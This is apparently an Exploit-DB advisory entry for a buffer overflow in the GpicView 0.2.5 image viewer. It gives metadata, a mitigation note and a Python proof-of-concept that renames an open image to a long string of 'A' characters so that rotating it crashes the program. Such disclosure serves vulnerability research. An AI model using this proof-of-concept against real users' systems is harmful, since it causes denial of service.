Vendor: GPicView
By: David Silveiro
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: GPicView
Affected Version From: 0.2.5
Affected Version To: 0.2.5
Patch Exists: NO
Related CWE: 0 day
CPE: a:lxde:gpicview
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 14 LTS
2016

GpicView Buffer Overflow DOS

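This exploit is a proof of concept for a buffer overflow vulnerability in GpicView, a lightweight image viewer. The exploit requires the user to open a maliciously crafted image file with GpicView and then rotate the image. In the proof of concept below, the crafting is done through the file name: while the image is open and 'Auto Save Images' is checked in the preferences, the file is renamed to 70 'A' characters followed by '.png'. Rotating the image then causes a buffer overflow, resulting in a denial of service.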

Mitigation:

The user should not open any suspicious image files with GpicView, and should ensure that the 'Auto Save Images' option is not enabled in the preferences.

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day

#Example: python POC.py [image-file]

from sys        import argv
from subprocess import Popen
from shlex      import split
from time       import sleep
import shutil

def DOS(arg):
                                          #"""------------------------------------"""#
    command    = 'gpicview ' + arg[1]     #'''   Receive file & construct Popen   '''#
    command_2  = split(command)           #"""------------------------------------"""#
                                          #"|"                                    "|"#
    Popen(command_2)                      #"""      Open file with Gpicview       """#
                                          #"""------------------------------------"""#
    print("Required: You have 15 seconds")
    print("to click on preferences, and ") 
    print("check 'Auto Save Images'     ")         
   
    sleep(15) 
                                          #"""------------------------------------"""#
    buffer = 'A' * 70 + '.png'            #"|"      Rename image with Buffer      "|"#
    shutil.move(arg[1], buffer)           #"""------------------------------------"""#

def main():

    print("Author:   David Silveiro   ")
    print("Company:  Xino.co.uk       ")
    print("   POC Gpicview DOS        ")

    DOS(argv)

    print("File ready for overflow    ")
    print("Now simply rotate the image")


if __name__ == "__main__":
    main()